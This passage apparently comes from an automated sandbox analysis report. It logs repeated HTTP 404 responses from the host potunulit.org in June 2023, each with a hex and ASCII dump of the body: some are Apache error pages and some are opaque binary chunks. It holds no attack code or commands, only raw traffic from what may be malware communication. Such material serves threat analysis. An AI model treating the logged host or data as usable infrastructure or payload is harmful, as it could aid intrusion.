5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 14 b8 89 8b e1 12 22 d7 9c 8a c1 e0 2b 83 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c e1 6f f5 52 48 44 60 96 4d 9b e7 17 3f f0 e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea Data Ascii: 4c7`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGsth9//F3L qJhv=0<VMG8+1lU3Ob>!ZC:>%wSSP{~x5;E$O
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZSrg87XvkZRs5E6Hp36MCf%2BIiomW3Vsacl4tzqtfTmDK4cZqTLzUkw0L8eyhLmcAnJpxFnplzLjN2pM%2F7KTDLIIV4oHT%2FX93FZUT2dcPLENDeFAa6%2BwMz6K4kv5jMYPu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d0737a7f5ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9rXERhl8K7ZCrWXa7pPnuaKFmrlrycYpBs8CdUwpt%2Frec2Y2nctRb39m%2B4OWGp5NX%2F8jPllaMRB%2FzSwss07gQVyG71FFeLV3Kb56nRYKR1aMoDmV2nhty9AnEW613QQV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d0745aee5ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 30 31 37 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 dd 73 d4 74 c4 ec c2 1d 68 bc 39 d1 b4 2f e5 12 2f bd 46 33 4c 11 08 1b bc 09 dd 90 a5 df e3 d2 8d d2 20 a4 71 f7 87 a5 e8 c6 15 dd 1b dd 81 1f 4a ca 68 9e db 8e ed c9 76 3d 30 3c 95 56 0b a2 4d e6 17 47 8e 1e 9d b4 38 2b 15 ba be bd c9 31 bf 6c 13 d9 55 ca 88 ab 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 06 d0 25 77 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e ad fe ff 78 35 05 db c4 0d 13 13 3b 45 e1 92 24 18 4f c5 03 a1 c1 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ca af 96 be 21 51 61 22 a9 32 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 5f 11 ed 0e c0 eb 7e 71 eb f0 ad 1a b0 9a 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 bb 70 b9 a6 e5 cc 23 b2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f fb fb cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d cb 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 17 8d d6 8e 82 11 e8 e4 1f b6 a8 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 b0 79 cb 1f d4 5c 62 91 9c 17 06 f1 2c b2 a7 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 14 b8 89 8b e1 12 22 d7 9c 8a c1 e0 2b 83 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c e1 6f f5 52 48 44 60 96 4d 9b e7 17 3f f0 e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 Data Ascii: 1017`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGsth9//F3L qJhv=0<VMG8+1lU3Ob>!ZC:>%wSSP{~x5;E$O
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0lExLFT6rah%2FX5DaQqsw1f6MQ92TLdsA3OLKKTxslajRSEFikrAB87wu%2BAf5BJM8HG0%2Bhr4%2FKEMe6eQH1DLlNao6fW3uv5ggYUhs%2BUClCFsbP3w5SDg8ukTmFMDpAriL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d077dcf55ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jQGgZc2xn1UHcIKJfHBZAR6is8FblGjyaQswWJUoP8v0jtuNGJcRk7%2BNJOE8rC5ZGvryrYIxeg%2F8DSdqX%2BDpukUy82LlsgVDB4n6FoWHVyRbTsfHYDrxLa3E%2FqRB%2BTOI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d078cd905ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=orgcqHRIC4wBSwb9jv2yydrB%2Fzy%2B0iWUQ84wE53aXRVVLYCJGDKrjnJTWZpalXTNamxf8c7mXaFXvTsrs446LOF7P8bg42Q1wjKSJ%2Fq9jlJG6F4IOSuAOK9qjgEWo0%2Fe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d0799e075ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 63 37 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 dd 73 d4 74 c4 ec c2 1d 68 bc 39 d1 b4 2f e5 12 2f bd 46 33 4c 11 08 1b bc 09 dd 90 a5 df e3 d2 8d d2 20 a4 71 f7 87 a5 e8 c6 15 dd 1b dd 81 1f 4a ca 68 9e db 8e ed c9 76 3d 30 3c 95 56 0b a2 4d e6 17 47 8e 1e 9d b4 38 2b 15 ba be bd c9 31 bf 6c 13 d9 55 ca 88 ab 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 06 d0 25 77 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e ad fe ff 78 35 05 db c4 0d 13 13 3b 45 e1 92 24 18 4f c5 03 a1 c1 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 ca af 96 be 21 51 61 22 a9 32 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 5f 11 ed 0e c0 eb 7e 71 eb f0 ad 1a b0 9a 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 bb 70 b9 a6 e5 cc 23 b2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f fb fb cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d cb 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 17 8d d6 8e 82 11 e8 e4 1f b6 a8 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 b0 79 cb 1f d4 5c 62 91 9c 17 06 f1 2c b2 a7 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 14 b8 89 8b e1 12 22 d7 9c 8a c1 e0 2b 83 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c e1 6f f5 52 48 44 60 96 4d 9b e7 17 3f f0 e9 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 Data Ascii: 4c7`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGsth9//F3L qJhv=0<VMG8+1lU3Ob>!ZC:>%wSSP{~x5;E$Oa
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l%2FDpgF2rumH5FTd%2BHCIZEIMkwbxjD9Qi%2BfOqsvH%2Buj6TcOBF%2ByOYkWJcAVtLGKvNhB2PZv03PAaYauTNm55MQVjLl6lSWyN7EACu%2FYy37qEBsw5K%2B8JcJFz4iEdKqWqV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d07dc8b65ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OXnfvF8aGufIkOadAS9zhvz1eN9DLArH2JK8ePeO%2FmDVo7DKNSEcYl6A6RnkiL4UgXOe0QwCPmG8rHUcdXP0IUPEB07R5dDK9RMWaBeZpwJUp7EG2i0vyGO3i56lQVyP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d07ef9655ca4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 9a 1d d8 47 c7 fb 19 ed 2a fe 27 0a 5d 3b bf 64 11 6d 80 5c 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:G*'];dm\ga
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b32FXGXE%2B1LtR2ecIPWYsKz2fy3vhZ4CdOGRJEEkaFjf%2FLjkq5qTgyNiLjjXPfJDNYV5FJywHLTXr3MHN6ZbLtZVM0dvPcDDi6MDfirmHD7YRaz70WMhMY%2BFmUfReUDh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d0a4eb0830f3-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:27:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jwG48glxIpP2vk9ZzXo9k6FE7n0e3%2B71HSZ3Uy6zQyN035T9eNPYe7m2jfYu0nEZRRmat3PkT4eyQBHiKaIPEa%2FTxItcAyDhlFfL60wcEdjdJHvsF0piCAcKLoaWlxlf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d0a81d4c30f3-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 36 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 88 1a 85 a2 4e fb 79 be 3d 44 55 3b be 63 1c 61 0d 0a Data Ascii: 26Uys/~(`:I_Ny=DU;ca
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Jun 2023 02:28:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G4Me81q%2Fax32apvJ0gP9%2BZekmw52lXiT%2BptsrYdKOlkbVYJXfQ%2Fv0dXbx5Yk7nQu9o81GFILTQ1h1BMKgHDgT3FGSAQ18Uind9sOn68qV5mkTgDB4QPY9yNNj527sjTH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7da8d0d36d049a33-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 